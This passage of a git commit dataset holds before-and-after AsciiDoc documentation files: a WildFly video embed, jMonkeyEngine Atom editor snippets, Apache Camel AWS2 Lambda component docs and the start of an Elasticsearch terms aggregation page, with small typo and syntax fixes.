\n\n{nbsp}\n\n+++\n<iframe class=\"blog-video-frame\" src=\"\/\/player.vimeo.com\/video\/78786992\" frameborder=\"0\" webkitallowfullscreen mozallowfullscreen allowfullscreen><\/iframe> <p><a href=\"http:\/\/vimeo.com\/78786992\">Role Based Access Control in WildFly 8 (Part 3 of 3)<\/a> from <a href=\"http:\/\/vimeo.com\/user22464624\">Brian Stansberry<\/a> on <a href=\"https:\/\/vimeo.com\">Vimeo<\/a>.<\/p>\n+++\n\nIn the final video I show how you can configure constraints which allow you to tweak the behavior of roles.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"416ffb582932f8b51979b2e3c6f457a7952cd314","subject":"Fixed broken kbd syntax.","message":"Fixed broken kbd syntax.\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/wiki\/atom_snippets.adoc","new_file":"src\/docs\/asciidoc\/wiki\/atom_snippets.adoc","new_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber:\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. 
The final kbd:[Tab] will take you into the block.\n\n| admonBwT\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n.Optional Title +\n ==== +\n ====\n| Inserts an `Admonition Block` with title.\n\n\n| admonP\n| NOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. The final kbd:[Tab] will take you to the beginning of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","old_contents":"= Atom Snippets Page\n:author: mitm\n:revnumber:\n:revdate: 2017-09-08T23:24:11.262Z\n:relfileprefix: ..\/\n:imagesdir: ..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nEdit this file to add snippets to the snippets.cson file for the\nlink:https:\/\/atom.io\/[Atom editor]. To use these snippets just copy and paste\nthe text below into your snippets.cson file.\n\n[source]\n----\n# Your snippets\n#\n# Atom snippets allow you to enter a simple prefix in the editor and hit tab to\n# expand the prefix into a larger code block with templated values.\n#\n# You can create a new snippet in this file by typing \"snip\" and then hitting\n# tab.\n#\n# An example CoffeeScript snippet to expand log to console.log:\n#\n# '.source.coffee':\n# 'Console log':\n# 'prefix': 'log'\n# 'body': 'console.log $1'\n#\n# Each scope (e.g. '.source.coffee' above) can only be declared once.\n#\n# This file uses CoffeeScript Object Notation (CSON).\n# If you are unfamiliar with CSON, you can read more about it in the\n# Atom Flight Manual:\n# http:\/\/flight-manual.atom.io\/using-atom\/sections\/basic-customization\/#_cson\n'.source.asciidoc':\n 'Inter-Doc Cross Reference':\n 'prefix': 'xref'\n 'body': '<<${1:path\/to\/wiki\/page}#,${2:custom label text}>>'\n 'Admonition Block':\n 'prefix': 'admonB'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n ====\n $6\n ====\n $7\n \"\"\"\n 'Admonition Block with Title':\n 'prefix': 'admonBwT'\n 'body': \"\"\"\n [${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}]\n .${6:Optional Title}\n ====\n $7\n ====\n $8\n \"\"\"\n 'Admonition Paragraph':\n 'prefix': 'admonP'\n 'body': \"\"\"\n ${1:NOTE}${2:TIP}${3:IMPORTANT}${4:CAUTION}${5:WARNING}: $6\n \"\"\"\n 'Admonition Paragraph with Title':\n 'prefix': 'admonPwT'\n 'body': \"\"\"\n .${1:Optional Title}\n ${2:NOTE}${3:TIP}${4:IMPORTANT}${5:CAUTION}${6:WARNING}: $7\n \"\"\"\n----\n\n== Snippets Explained\n\n[cols=\"10, 45,45\"*,options=\"header\"]\n|===\n\n| Prefix\n| Inserted Syntax\n| Description\n\n| xref\n|`+<<path\/to\/wiki\/page#,custom label text>>+`\n| Inserts an `Inter-Document Cross Reference`.\n\n| admonB\n| [NOTETIPIMPORTANTCAUTIONWARNING] +\n ==== +\n ====\n| Inserts an `Admonition Block` with the #NOTE# style highlighted. Use the kbd:[Tab] key to cycle to the next style\nand kbd:[Backspace] off any unwanted style as you go. 
The final kdd:[Tab] will take you to the begining of the paragraph.\n\n| admonPwT\n| .Optional Title +\nNOTETIPIMPORTANTCAUTIONWARNING:\n| Inserts an `Admonition Paragraph` with title.\n\n|===\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"5dd5585160611ee9df03ad6f7c9bac2b1c446868","subject":"Regen docs","message":"Regen docs\n","repos":"mcollovati\/camel,nicolaferraro\/camel,adessaigne\/camel,tdiesler\/camel,tdiesler\/camel,tdiesler\/camel,nikhilvibhav\/camel,mcollovati\/camel,tadayosi\/camel,DariusX\/camel,adessaigne\/camel,pax95\/camel,cunningt\/camel,ullgren\/camel,tadayosi\/camel,apache\/camel,tdiesler\/camel,apache\/camel,cunningt\/camel,pax95\/camel,apache\/camel,DariusX\/camel,christophd\/camel,ullgren\/camel,pmoerenhout\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,alvinkwekel\/camel,mcollovati\/camel,pax95\/camel,zregvart\/camel,cunningt\/camel,mcollovati\/camel,zregvart\/camel,alvinkwekel\/camel,adessaigne\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,DariusX\/camel,adessaigne\/camel,pmoerenhout\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,gnodet\/camel,christophd\/camel,tdiesler\/camel,alvinkwekel\/camel,cunningt\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pax95\/camel,DariusX\/camel,ullgren\/camel,tadayosi\/camel,tadayosi\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,nikhilvibhav\/camel,gnodet\/camel,zregvart\/camel,apache\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/aws2-lambda-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/aws2-lambda-component.adoc","new_contents":"[[aws2-lambda-component]]\n= AWS Lambda Component\n:page-source: components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc\n\n*Since Camel 3.2*\n\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n[NOTE]\n====\nThe AWS2 Lambda component is not supported in OSGI\n====\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. 
By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1). You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use an existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. 
The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. |Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, nodejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list 
of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security group IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Available Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of a LambdaClient bean in the registry.\nIf it's the only instance of that type, it will be used as the client and you won't have to define it as a uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]\n","old_contents":"[[aws2-lambda-component]]\n= AWS Lambda Component\n:page-source: components\/camel-aws2-lambda\/src\/main\/docs\/aws2-lambda-component.adoc\n\n*Since Camel 3.2*\n\n*Since Camel 3.2*\n\n\n\/\/ HEADER START\n*Only producer is supported*\n\/\/ HEADER END\n\nThe Lambda component supports create, get, list, delete and invoke\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda] functions.\n\n*Prerequisites*\n\nYou must have a valid Amazon Web Services developer account, and be\nsigned up to use Amazon Lambda. More information is available at\nhttps:\/\/aws.amazon.com\/lambda\/[AWS Lambda].\n\nWhen creating a Lambda function, you need to specify a IAM role which has at least the AWSLambdaBasicExecuteRole policy attached.\n\n*Warning*\n\nLambda is regional service. 
Unlike S3 bucket, Lambda function created in a given region is not available on other regions.\n\n== URI Format\n\n[source,java]\n-------------------------\naws2-lambda:\/\/functionName[?options]\n-------------------------\n\nYou can append query options to the URI in the following format,\n?options=value&option2=value&...\n\n== URI Options\n\n\n\/\/ component options: START\nThe AWS Lambda component supports 6 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *accessKey* (producer) | Amazon AWS Access Key | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *region* (producer) | Amazon AWS Region | | String\n| *secretKey* (producer) | Amazon AWS Secret Key | | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *configuration* (advanced) | The AWS Lambda default configuration | | Lambda2Configuration\n|===\n\/\/ component options: END\n\n\n\n\n\/\/ endpoint options: START\nThe AWS Lambda endpoint is configured using URI syntax:\n\n----\naws2-lambda:function\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *function* | *Required* Name of the Lambda function. | | String\n|===\n\n\n=== Query Parameters (11 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *operation* (producer) | The operation to perform. It can be listFunctions, getFunction, createFunction, deleteFunction or invokeFunction. The value can be one of: listFunctions, getFunction, createAlias, deleteAlias, getAlias, listAliases, createFunction, deleteFunction, invokeFunction, updateFunction, createEventSourceMapping, deleteEventSourceMapping, listEventSourceMapping, listTags, tagResource, untagResource, publishVersion, listVersions | invokeFunction | Lambda2Operations\n| *region* (producer) | Amazon AWS Region. 
When using this parameter, the configuration will expect the capitalized name of the region (for example AP_EAST_1) You'll need to use the name Regions.EU_WEST_1.name() | | String\n| *awsLambdaClient* (advanced) | To use a existing configured AwsLambdaClient as client | | LambdaClient\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *proxyHost* (proxy) | To define a proxy host when instantiating the Lambda client | | String\n| *proxyPort* (proxy) | To define a proxy port when instantiating the Lambda client | | Integer\n| *proxyProtocol* (proxy) | To define a proxy protocol when instantiating the Lambda client. The value can be one of: HTTP, HTTPS | HTTPS | Protocol\n| *accessKey* (security) | Amazon AWS Access Key | | String\n| *secretKey* (security) | Amazon AWS Secret Key | | String\n|===\n\/\/ endpoint options: END\n\n\n\n\nRequired Lambda component options\n\nYou have to provide the awsLambdaClient in the\nRegistry or your accessKey and secretKey to access\nthe https:\/\/aws.amazon.com\/lambda\/[Amazon Lambda] service.\n\n== Usage\n\n=== Message headers evaluated by the Lambda producer\n\n[width=\"100%\",cols=\"5%,5%,10%,75%,5%\",options=\"header\",]\n|=======================================================================\n|Operation |Header |Type |Description |Required\n\n|All |`CamelAwsLambdaOperation` |`String` |The operation we want to perform. Override operation passed as query parameter| Yes\n\n|createFunction |`CamelAwsLambdaS3Bucket` |`String` |Amazon S3 bucket name where the .zip file containing\nyour deployment package is stored. This bucket must reside in the same AWS region where you are creating the Lambda function.| No\n\n|createFunction |`CamelAwsLambdaS3Key` |`String` |The Amazon S3 object (the deployment package) key name\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaS3ObjectVersion` |String |The Amazon S3 object (the deployment package) version\nyou want to upload.| No\n\n|createFunction |`CamelAwsLambdaZipFile` |`String` |The local path of the zip file (the deployment package).\n Content of zip file can also be put in Message body.| No\n\n|createFunction |`CamelAwsLambdaRole` |`String` |The Amazon Resource Name (ARN) of the IAM role that Lambda assumes\n when it executes your function to access any other Amazon Web Services (AWS) resources. 
|Yes\n\n|createFunction |`CamelAwsLambdaRuntime` |String |The runtime environment for the Lambda function you are uploading.\n (nodejs, nodejs4.3, nodejs6.10, java8, python2.7, python3.6, dotnetcore1.0, odejs4.3-edge) |Yes\n\n|createFunction |`CamelAwsLambdaHandler` |`String` |The function within your code that Lambda calls to begin execution.\n For Node.js, it is the module-name.export value in your function.\n For Java, it can be package.class-name::handler or package.class-name.|Yes\n\n|createFunction |`CamelAwsLambdaDescription` |`String` |The user-provided description.|No\n\n|createFunction |`CamelAwsLambdaTargetArn` |`String` |The parent object that contains the target ARN (Amazon Resource Name)\nof an Amazon SQS queue or Amazon SNS topic.|No\n\n|createFunction |`CamelAwsLambdaMemorySize` |`Integer` |The memory size, in MB, you configured for the function.\nMust be a multiple of 64 MB.|No\n\n|createFunction |`CamelAwsLambdaKMSKeyArn` |`String` |The Amazon Resource Name (ARN) of the KMS key used to encrypt your function's environment variables.\nIf not provided, AWS Lambda will use a default service key.|No\n\n|createFunction |`CamelAwsLambdaPublish` |`Boolean` |This boolean parameter can be used to request AWS Lambda\nto create the Lambda function and publish a version as an atomic operation.|No\n\n|createFunction |`CamelAwsLambdaTimeout` |`Integer` |The function execution time at which Lambda should terminate the function.\nThe default is 3 seconds.|No\n\n|createFunction |`CamelAwsLambdaTracingConfig` |`String` |Your function's tracing settings (Active or PassThrough).|No\n\n|createFunction |`CamelAwsLambdaEnvironmentVariables` |`Map<String, String>` |The key-value pairs that represent your environment's configuration settings.|No\n\n|createFunction |`CamelAwsLambdaEnvironmentTags` |`Map<String, String>` |The list of tags (key-value pairs) assigned to the new function.|No\n\n|createFunction |`CamelAwsLambdaSecurityGroupIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more security groups IDs in your VPC.|No\n\n|createFunction |`CamelAwsLambdaSubnetIds` |`List<String>` |If your Lambda function accesses resources in a VPC, a list of one or more subnet IDs in your VPC.|No\n\n|createAlias |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name to set in the alias|Yes\n\n|createAlias |`CamelAwsLambdaAliasFunctionDescription` |`String` |The function description to set in the alias|No\n\n|deleteAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|getAlias |`CamelAwsLambdaAliasFunctionName` |`String` |The function name of the alias|Yes\n\n|listAliases |`CamelAwsLambdaFunctionVersion` |`String` |The function version to set in the alias|Yes\n\n|=======================================================================\n\n== List of Avalaible Operations\n\n- listFunctions\n- getFunction\n- createFunction\n- deleteFunction\n- invokeFunction\n- updateFunction\n- createEventSourceMapping\n- deleteEventSourceMapping\n- listEventSourceMapping\n- listTags\n- tagResource\n- untagResource\n- publishVersion\n- listVersions\n- createAlias\n- deleteAlias\n- getAlias\n- listAliases\n\n== Example\n\nTo have a full understanding of how the component works, you may have a look at this 
https:\/\/github.com\/apache\/camel\/blob\/master\/components\/camel-aws\/src\/test\/java\/org\/apache\/camel\/component\/aws\/lambda\/integration\/LambdaComponentIntegrationTest.java[integration test]\n\n== Automatic detection of LambdaClient client in registry\n\nThe component is capable of detecting the presence of an LambdaClient bean into the registry.\nIf it's the only instance of that type it will be used as client and you won't have to define it as uri parameter.\nThis may be really useful for smarter configuration of the endpoint.\n\n\n== Dependencies\n\nMaven users will need to add the following dependency to their pom.xml.\n\n*pom.xml*\n\n[source,xml]\n---------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-aws2-lambda<\/artifactId>\n <version>${camel-version}<\/version>\n<\/dependency>\n---------------------------------------\n\nwhere `$\\{camel-version\\}` must be replaced by the actual version of Camel.\n\n\ninclude::camel-spring-boot::page$aws-lambda-starter.adoc[]","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3b2556db3d37b81f974c17249be533f6f20a032","subject":"fix no=>not typo (#32463)","message":"fix no=>not typo (#32463)\n\nFound a tiny typo while reading the docs","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/aggregations\/bucket\/terms-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/bucket\/terms-aggregation.asciidoc","new_contents":"[[search-aggregations-bucket-terms-aggregation]]\n=== Terms Aggregation\n\nA multi-bucket value source based aggregation where buckets are dynamically built - one per unique value.\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[source,js]\n--------------------------------------------------\nPUT \/products\n{\n \"mappings\": {\n \"product\": {\n \"properties\": {\n \"genre\": {\n \"type\": \"keyword\"\n },\n \"product\": {\n \"type\": \"keyword\"\n }\n }\n }\n }\n}\n\nPOST \/products\/product\/_bulk?refresh\n{\"index\":{\"_id\":0}}\n{\"genre\": \"rock\", \"product\": \"Product A\"}\n{\"index\":{\"_id\":1}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":2}}\n{\"genre\": \"rock\"}\n{\"index\":{\"_id\":3}}\n{\"genre\": \"jazz\", \"product\": \"Product Z\"}\n{\"index\":{\"_id\":4}}\n{\"genre\": \"jazz\"}\n{\"index\":{\"_id\":5}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":6}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":7}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":8}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":9}}\n{\"genre\": \"electronic\"}\n{\"index\":{\"_id\":10}}\n{\"genre\": \"electronic\"}\n\n-------------------------------------------------\n\/\/ NOTCONSOLE\n\/\/ TESTSETUP\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nExample:\n\n[source,js]\n--------------------------------------------------\nGET \/_search\n{\n \"aggs\" : {\n \"genres\" : {\n \"terms\" : { \"field\" : \"genre\" }\n }\n }\n}\n--------------------------------------------------\n\/\/ CONSOLE\n\/\/ TEST[s\/_search\/_search\\?filter_path=aggregations\/]\n\nResponse:\n\n[source,js]\n--------------------------------------------------\n{\n ...\n \"aggregations\" : {\n \"genres\" : {\n \"doc_count_error_upper_bound\": 0, <1>\n \"sum_other_doc_count\": 0, <2>\n \"buckets\" : [ <3>\n {\n 